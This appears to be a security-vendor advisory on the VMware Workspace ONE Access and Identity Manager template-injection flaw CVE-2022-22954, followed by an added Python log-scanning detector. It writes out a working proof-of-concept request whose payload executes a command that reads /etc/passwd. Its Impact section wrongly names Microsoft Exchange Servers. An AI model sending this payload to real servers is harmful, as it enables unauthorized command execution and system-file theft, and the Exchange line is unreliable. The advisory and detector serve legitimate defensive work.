Multiple VMware Products Found Vulnerable to Server-Side Template Injection CVE-2022-22954

Updated on: April 19, 2023
Published on: April 15, 2022
Category: Vulnerability Intelligence
Vulnerability Class: Server-Side Template Injection/RCE
CVE ID: CVE-2022-22954
CVSS:3.0 Score: 9.8

Executive Summary

  • CloudSEK’s Customer Threat Research Team analyzed a remote code execution vulnerability impacting VMware products, including Workspace ONE Access and Identity Manager.
  • VMware Workspace ONE Access gives users faster access to SaaS, web, and native mobile apps with Multi-Factor Authentication (MFA), conditional access, and single sign-on. VMware Identity Manager is Workspace ONE's identity and access management component.
  • The server-side template injection has been assigned CVE-2022-22954 with a maximum CVSSv3 score of 9.8. The affected VMware versions include:
    • VMware Workspace ONE Access Appliance - 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
    • VMware Identity Manager Appliance - 3.3.6, 3.3.5, 3.3.4, 3.3.3
  • VMware has released patches that fix this vulnerability.

Analysis

  • On 6 April 2022, VMware released an advisory addressing eight vulnerabilities present in multiple VMware products.
  • CVE-2022-22954 is a server-side template injection vulnerability that can lead to remote code execution on the affected versions. It impacts VMware Workspace ONE Access as well as VMware Identity Manager and has been assigned a critical CVSSv3 base score of 9.8.
  • To exploit the vulnerability, an attacker with network access simply needs to send a specially crafted request to a vulnerable VMware Workspace ONE Access or Identity Manager instance.
  • Successful exploitation of the vulnerability could result in remote code execution on the vulnerable server.

Information from OSINT

  • A Shodan search revealed 711 publicly exposed VMware Workspace ONE instances.
  • Several threat actors, including APT groups, have targeted VMware products in the past to conduct attacks ranging from ransomware to espionage.
[Figure: Publicly reachable VMware Workspace ONE instances]

Information from Cybercrime Platforms

  • Multiple threat actors have been discussing this vulnerability on various cybercrime forums and Telegram channels. (For more information, refer to the Appendix.)
  • The discussions comprise the following information:
    • Methods of leveraging the impact by chaining exploits.
    • Shodan queries to search for vulnerable instances in the wild.
    • Functioning proof of concepts (PoCs), available on request, using intercepting tools like Burp Suite.

How does SSTI Result in Remote Code Execution?

  • A server-side template injection (SSTI) vulnerability gives an attacker the ability to execute commands on the remote server. This attack vector is well documented and affects most major backend stacks and their template engines, e.g. FreeMarker/Java, Velocity/Java, Twig/PHP, Jade/Node.js, and many more.
  • Server-side template injection occurs whenever user input is concatenated directly into a template rather than being passed in as data. Hence, attackers can manipulate the template engine by injecting arbitrary template directives.
  • An attacker can use this to execute commands, including reverse shell payloads, resulting in remote code execution. This makes the vulnerability extremely easy to exploit while granting complete control of the server.

POC (Proof of Concept)

{host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d
PoC for CVE-2022-22954
  • The above GET request will return the contents of the /etc/passwd file from a vulnerable server.
  • The URL-encoded string given as the value of the deviceUdid parameter is: ${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
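The following is an added example and not part of CloudSEK's write-up: a small Python scanner that applies the request shape described above (the deviceUdid parameter of the /catalog-portal/ui/oauth/verify endpoint carrying a FreeMarker ?new() directive) to web-server access logs, decoding the parameter repeatedly so that a double URL-encoded copy of the same payload is caught as well. The log lines, IP addresses and function names are constructed for the illustration.

```python
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Request shape from the PoC above: a FreeMarker ?new() directive in deviceUdid of the verify endpoint.
VULN_PATH = "/catalog-portal/ui/oauth/verify"
FREEMARKER_SSTI = re.compile(
    r"\$\{.*?(freemarker\.template\.utility\.Execute|\?new\s*\().*?\}", re.S)
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Decoded payload quoted above and its URL-encoded form from the PoC URL.
PAYLOAD = '${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}'
ENC = "%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d"
# Constructed access-log lines (not real traffic): a benign request, the PoC as published, and the payload double URL-encoded.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [15/Apr/2022:10:01:02 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=ABC123 HTTP/1.1" 200 512',
    f'10.0.0.7 - - [15/Apr/2022:10:01:09 +0000] "GET {VULN_PATH}?error=&deviceUdid={ENC} HTTP/1.1" 200 1900',
    f'10.0.0.8 - - [15/Apr/2022:10:01:12 +0000] "GET {VULN_PATH}?error=&deviceUdid={quote(quote(PAYLOAD, safe=""), safe="")} HTTP/1.1" 200 1900',
])

def fully_decode(value, max_rounds=3):
    """Undo repeated URL encoding; double encoding is a common filter evasion."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(target):
    """Return a finding dict for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    # parse_qs already strips one encoding layer; fully_decode strips any remaining ones.
    for udid in parse_qs(parts.query, keep_blank_values=True).get("deviceUdid", []):
        decoded = fully_decode(udid)
        if FREEMARKER_SSTI.search(decoded):
            return {"param": "deviceUdid", "decoded": decoded}
    return None

def scan_log(text):
    """Scan access-log lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        hit = inspect_request(m.group("target")) if m else None
        if hit:
            hit["src"] = line.split()[0]  # client address is the first field
            findings.append(hit)
    return findings
```

Running scan_log(SAMPLE_LOG) flags the two requests from 10.0.0.7 and 10.0.0.8, both decoding to the payload quoted above, while the benign deviceUdid=ABC123 request is not reported.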

Impact & Mitigation

Impact
  • Attackers could use this exploit to gain unauthorized access and escalate privileges on Microsoft Exchange Servers.
  • This vulnerability could even lead to an RCE (remote code execution) attack.
  • RCE can lead to devastating attacks, including but not limited to ransomware campaigns.
Mitigation
  • Apply the patches VMware has released for this vulnerability to the affected Workspace ONE Access and Identity Manager versions listed above.

References

Appendix

[Figure: PoC of the exploitation of CVE-2022-22954]
[Figure: A threat actor discussing the vulnerability on a Telegram channel]
[Figure: A threat actor posting about the vulnerability on a cybercrime forum]
